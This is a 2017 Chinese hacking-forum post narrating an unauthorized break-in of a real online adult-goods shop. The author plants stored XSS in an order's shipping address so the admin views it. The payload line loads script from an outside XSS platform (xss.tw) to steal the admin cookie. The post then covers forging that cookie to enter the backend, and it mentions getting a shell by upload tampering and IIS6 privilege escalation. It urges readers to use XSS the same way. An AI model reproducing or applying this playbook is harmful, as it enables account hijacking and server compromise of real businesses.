黑帽SEO技术论坛|商业源码|棋牌资源网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月
文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月
查看: 61|回复: 0

利用XSS打掉某成人购物商城

[复制链接]

1320

主题

1322

帖子

4015

积分

超级版主

Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18

积分
4015
发表于 2017-3-3 18:47:59 | 显示全部楼层 |阅读模式

正文:进习科有点时间了.整天在群里扯淡.看三十他们日站.交流气氛很活跃.很喜欢这样的群和论坛.本来进来的时候就想过写点什么的.但删删写写的.最后只剩下这篇了~!
日站吗,我也没什么新思路,注入.上传.扫敏感目录或信息或者已知的CMS.百度找发布过的0DAY来打.这些都很是很常见的思路.写出来大家估计也没什么兴趣吧!
而如果以上思路都不行的时候.你不防试试XSS.而且XSS现在也挺流行的.XSS的危害和注入上传等差不多的.关键在于看你怎么利用了.不过我只一介小菜.
所以在这篇文章中你可能看不到任何高技术含量的东西.但总算是我对XSS的一点小理解和利用的一点心得.各位牛轻拍,谢谢! 前几天搞一购物站.卖成人用品的.在前台转了几圈.手工测试了N多连接.搜索和登陆等无注射。
无奈只好用WVS扫描了一圈.提示几个反射的XSS.还是没有什么能利用的.跑了一下目录也无利用.
我搞站一般不喜欢一上来就扫描.很多时候有墙的话会被封IP麻烦。旁注是独立服务器.C段就不用想了.
累死还不一定能嗅。于是我注册了个用户进去逛.看有没有上传头像等功能.或许可以抓包改包上传.那就人品爆发了。

逛了一圈后,发现无任何上传.这下有点麻烦了.继续去逛他商成.发现购买东西后可以留言评论商品.想到了XSS.这感情好啊.
那我就可以写XSS了.不过把XSS写进评论那不好.管理不一定会看去看评论.那我把XSS写进我用户资料或者收货地址里.随便去买个东西选货到付款.
然后插个XSS到盯单那提交进后台.等管理后台一看盯单不就中了?事实证明我这样想是对的.
写入一个XSS代码测试看下:
10001KY9-0.jpg


写好提交后效果:
10001G238-1.jpg


成功弹出框框.XSS可利用.还是储存的.好吧现在写入一个盗取COOKIE并记录后台操作地址的JS进去!


没有任何过虑.直接写<script src=http://xss.tw/xxx></script>就可以
现在XSS平台很多.我用的XSS.TW.这个平台功能算是比较齐全吧.你也可以自己搭建一个平台.
下面看效果:
10001Ib7-2.jpg



查看源码可以看到XSS代码已经成功植入.
现在要做的就是去前台商成购买个商品.然后提交盯单.等管理去看盯单马上中招。 10001L346-3.jpg




收货地址直接写XSS代码.因为管理后台看你盯单肯定会看收货地址.然后你们懂的。现在就把这个订单提交进去.记得选货到付款.
如果你选的在线支付.就会跳转去支付宝或者网银去了.那肯定不行鸟。
提交盯单后就是等管理上线去后台看盯单了.XSS就这点不好.被动。但你说他鸡肋那就错了.我提交了盯单后.管理果然没多久就上线到后台看盯单了.因为我开启了邮件提醒.只要被X就会有邮件提示。
结果管理悲剧了.看图:
10001K619-4.jpg



看见木有.连管理密码和后台操作地址都记录过来了.COOKIE里面还包含了管理登陆帐户和加密的MD5密码。
于是我直接跑去解密码.结果悲剧的MD5解不出来.好吧.有了COOKIE就用操心这个.看我直接伪造管理COOKIE登陆后台!COOKIE伪造我用的老兵的COOKIE浏览器!
火狐浏览器有个COOKIE工具的.但火狐对某些页面不兼容你们懂的.
10001G0H-5.jpg



成功进入后台.至此结束吧.至于拿SHELL我就不多说了.写了一晚上.改来改去.排版好麻烦的说。
后台过程就是一个上传抓包改包提交下拿SHELL.IIS6提权秒掉服务器

总结了下.不要轻言放弃.XSS用处很大的.这个站.本来就只能干看着或者想别的办法.但是一个XSS就打进后台拿SHELL提权.可想而知XSS的强大。
各位牛.多关注XSS吧.进了习科.很少人玩XSS.我真的很寂寞!有对XSS感兴趣的朋友可以加Q多交流.

如果你想了解更多的例子.可以看乌云跨站牛们发的一些XSS案例:
http://wooyun.org/whitehats/gainover 等.可以自己去看.百度也很多资料!
介绍XSS的一些资料:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
http://html5sec.org/


回复

使用道具 举报

*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|黑帽SEO技术论坛|商业源码|棋牌资源网  |网站地图

Powered by Discuz! X3.3© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表